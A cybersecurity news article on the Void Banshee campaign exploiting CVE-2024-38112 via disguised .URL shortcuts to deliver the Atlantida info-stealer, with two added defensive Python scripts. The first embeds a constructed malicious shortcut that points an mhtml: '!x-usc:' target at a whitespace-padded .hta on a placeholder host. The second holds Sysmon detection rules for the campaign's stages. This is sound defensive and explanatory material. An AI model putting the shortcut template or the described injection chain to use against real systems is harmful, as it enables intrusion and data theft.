Windows Users Beware: Hackers Exploit Internet Explorer Zero-Day Vulnerability

The Void Banshee APT group exploited CVE-2024-38112, an MHTML remote code execution vulnerability, to run malicious code through Internet shortcut (.URL) files and the disabled Internet Explorer engine, delivering the Atlantida info-stealer.

The attack chain, targeting North America, Europe, and Southeast Asia, leverages URL files and x-usc directives to bypass Internet Explorer restrictions, enabling the threat actor to access and run files directly within the disabled browser instance. 

Attack chain of the CVE-2024-38112 zero-day campaign

Although Internet Explorer is disabled on modern Windows systems, attackers exploited its remnants through CVE-2024-38112 in MSHTML to execute malicious HTA files via specially crafted .URL files.

This technique leveraged the MHTML protocol handler and the x-usc directive to bypass security measures and run code within the disabled IE process, closely resembling earlier attacks such as CVE-2021-40444. Microsoft addressed the threat by unregistering the MHTML handler from Internet Explorer in the July 2024 Patch Tuesday update.

Internet Explorer mode in Microsoft Edge

Void Banshee employed spearphishing links disguised as PDF files, primarily targeting professionals and students by leveraging online platforms hosting educational materials. 

The attack chain begins with a malicious URL shortcut file mimicking a PDF. It exploits CVE-2024-38112 to redirect the victim’s browser to a compromised website hosting a malicious HTA, abusing the MHTML protocol handler and the x-usc directive for execution.

Malicious URL file disguised to look like a PDF of a book

The attacker leverages Internet Explorer to download a malicious HTA file disguised as a PDF. The HTML file, hosted on a compromised domain, controls the browser window size to obfuscate the download process.

The HTA file’s extension is intentionally hidden to deceive the user. This exploits Internet Explorer’s default behavior of opening HTA files, which modern browsers do not share.

The HTA file extension does not appear on the screen

The “Books_A0UJKO.pdf<26 spaces>.hta” file, a disguised HTA shortcut, launches a VBScript that decrypts XOR-encrypted content and executes it using PowerShell.
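The delivery stage described above (a .URL shortcut whose target uses the mhtml: handler and an x-usc directive to hand a remote HTA to the Internet Explorer engine, with the real extension hidden behind whitespace) can be triaged statically. The following inspector is an added example written for this page; it is not code from the article or from Trend Micro. The sample shortcut content, file name and hostnames are constructed for the example and are not indicators from the campaign.

```python
"""
Static inspection of Internet Shortcut (.URL) files for the delivery pattern
described in the article: an mhtml: target carrying an '!x-usc:' directive that
makes the (disabled) Internet Explorer engine fetch a remote HTA whose name hides
the .hta extension behind a run of spaces.  Example code, not the article's own.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# A document-looking name followed by two or more spaces and a script/shortcut
# extension, e.g. "Books.pdf                .hta" (the article's padding trick).
PADDED_EXT_RE = re.compile(
    r"\.(pdf|docx?|xlsx?|txt)\s{2,}\.(hta|url|lnk|js|vbs|exe)$", re.IGNORECASE
)

# Constructed sample in the shape the article describes; hostnames are placeholders.
SUSPICIOUS_NAME = "Books_A0UJKO.pdf" + " " * 10 + ".url"
SUSPICIOUS_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=mhtml:http://placeholder.invalid/index.html!x-usc:"
    "http://placeholder.invalid/Books_A0UJKO.pdf" + " " * 26 + ".hta\n"
    "IconIndex=13\n"
)

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://www.example.com/report.pdf\n"


def parse_internet_shortcut(content: str) -> Dict[str, str]:
    """Minimal parser for the INI-style .URL format.

    Returns the key/value pairs of the [InternetShortcut] section with
    lower-cased keys.  Whitespace inside a value (the padding trick) is kept.
    """
    fields: Dict[str, str] = {}
    section: Optional[str] = None
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def x_usc_target(url: str) -> Optional[str]:
    """Return the URL that follows an '!x-usc:' directive, or None if absent."""
    marker = "!x-usc:"
    idx = url.lower().find(marker)
    if idx == -1:
        return None
    return url[idx + len(marker):]


def last_path_component(url: str) -> str:
    """Final path segment of a URL, percent-decoded, without query or fragment."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    return unquote(path.rsplit("/", 1)[-1])


def assess_internet_shortcut(content: str, filename: str = "") -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    if filename and PADDED_EXT_RE.search(filename):
        findings.append(f"shortcut file name hides its real extension: {filename!r}")

    target = parse_internet_shortcut(content).get("url", "")
    if target.lower().startswith("mhtml:"):
        findings.append("URL target uses the mhtml: protocol handler (rendered by MSHTML)")

    inner = x_usc_target(target)
    if inner is not None:
        findings.append("URL target carries an !x-usc: directive (MSHTML redirection pattern)")
        name = last_path_component(inner)
        if PADDED_EXT_RE.search(name):
            findings.append(f"x-usc target hides an .hta extension behind whitespace: {name!r}")
        elif name.lower().endswith(".hta"):
            findings.append(f"x-usc target is an HTA file: {name!r}")
    return findings


if __name__ == "__main__":
    for line in assess_internet_shortcut(SUSPICIOUS_URL_FILE, SUSPICIOUS_NAME):
        print("FINDING:", line)
    print("benign findings:", assess_internet_shortcut(BENIGN_URL_FILE, "report.url"))
```

Run it over .URL attachments pulled from mail quarantine or a user’s Downloads folder; any mhtml: target, and in particular one with an x-usc directive, has no legitimate reason to appear in a shortcut that claims to be a PDF.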

The downloaded PowerShell script (“become.txt”) hides its console window, retrieves another malicious script from a compromised server, and then loads that downloaded script as a .NET assembly and executes its code, likely for further malicious actions.

Contents of the “become.txt” PowerShell file

The .NET Trojan loader “LoadToBadXml.exe” decrypts an XOR-encrypted payload using a specific key and injects it into a legitimate process, “RegAsm.exe”.

The loader suspends “RegAsm.exe”, allocates memory within it, writes the payload there, and finally creates a thread to execute it. Trend Micro’s analysis found that “LoadToBadXml.exe” is a modified version of an open-source shellcode injector.

The injected payload is most likely “Donut Loader,” another open-source tool that can execute various types of files in memory, including the final-stage malware in this attack.

LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process

Atlantida is an info-stealer that targets sensitive data from various applications, including messaging apps, gaming platforms, file transfer clients, cryptocurrency wallets, and web browsers. 

It captures screenshots, system information, and geolocation data, and steals files and credentials. The malware leverages open-source stealer code, collects data from multiple sources, and transmits a compressed archive of stolen data to a C&C server over TCP port 6666. 
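The post-exploitation chain the article lays out (an HTA handed to the Internet Explorer engine, PowerShell launched from it, a thread created inside RegAsm.exe by another process, and the stolen archive sent over TCP port 6666) maps onto a few endpoint-telemetry rules. The triage script below is an added example written for this page, not code from the article or from Trend Micro. Sysmon Event IDs 1 (process creation), 8 (CreateRemoteThread) and 3 (network connection) are real Sysmon IDs; the events, paths and IP address are constructed for the example, and the assumption that the HTA runs under mshta.exe with iexplore.exe as its parent is the author’s, not a detail the article states.

```python
"""
Triage of Sysmon-style endpoint events for the stages the article describes:
  1. mshta.exe started by Internet Explorer (HTA opened via the x-usc trick),
  2. PowerShell spawned from the HTA host (the article's VBScript -> PowerShell step),
  3. a remote thread created inside RegAsm.exe (the LoadToBadXml.exe injection),
  4. an outbound TCP connection on port 6666 (Atlantida exfiltration).
Example code, not the article's own.  Events below are constructed samples.
"""
import ntpath
from typing import Any, Callable, Dict, List, Tuple

Event = Dict[str, Any]

REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed sample telemetry: four events from the described chain plus two benign ones.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},                      # benign
    {"EventID": 8, "SourceImage": r"C:\Users\user\AppData\Local\Temp\LoadToBadXml.exe",
     "TargetImage": REGASM},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Protocol": "tcp", "DestinationIp": "198.51.100.7", "DestinationPort": 443},  # benign
    {"EventID": 3, "Image": REGASM, "Protocol": "tcp",
     "DestinationIp": "203.0.113.10", "DestinationPort": 6666},
]


def base(path: Any) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(str(path or "")).lower()


# Each rule is (name, predicate over one event).  Order matches the attack chain.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("hta_host_started_by_internet_explorer",
     lambda e: e.get("EventID") == 1 and base(e.get("Image")) == "mshta.exe"
     and base(e.get("ParentImage")) == "iexplore.exe"),
    ("powershell_spawned_by_script_host",
     lambda e: e.get("EventID") == 1
     and base(e.get("Image")) in {"powershell.exe", "pwsh.exe"}
     and base(e.get("ParentImage")) in {"mshta.exe", "wscript.exe", "cscript.exe"}),
    ("remote_thread_into_regasm",
     lambda e: e.get("EventID") == 8 and base(e.get("TargetImage")) == "regasm.exe"),
    ("outbound_tcp_6666",
     lambda e: e.get("EventID") == 3 and str(e.get("Protocol", "")).lower() == "tcp"
     and int(e.get("DestinationPort", 0)) == 6666),
]


def triage(events: List[Event]) -> List[Dict[str, Any]]:
    """Apply every rule to every event; return one alert per match, in event order."""
    alerts: List[Dict[str, Any]] = []
    for index, event in enumerate(events):
        for name, predicate in RULES:
            if predicate(event):
                alerts.append({"index": index, "rule": name,
                               "image": event.get("Image") or event.get("SourceImage")})
    return alerts


def chain_confidence(alerts: List[Dict[str, Any]]) -> str:
    """Crude escalation: the more distinct stages seen on one host, the stronger the case."""
    stages = {a["rule"] for a in alerts}
    if len(stages) >= 3:
        return "high"
    if len(stages) == 2:
        return "medium"
    return "low" if stages else "none"


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for alert in found:
        print(f"event {alert['index']}: {alert['rule']} ({alert['image']})")
    print("chain confidence:", chain_confidence(found))
```

The individual rules are noisy on their own (RegAsm.exe is a legitimate .NET tool, and port 6666 alone proves nothing), which is why the chain-level score matters more than any single hit; a remote thread into RegAsm.exe followed by an outbound connection from that same process is the pairing worth paging on.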

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and reporter with Cyber Press. She covers cyber security incidents happening across cyberspace.
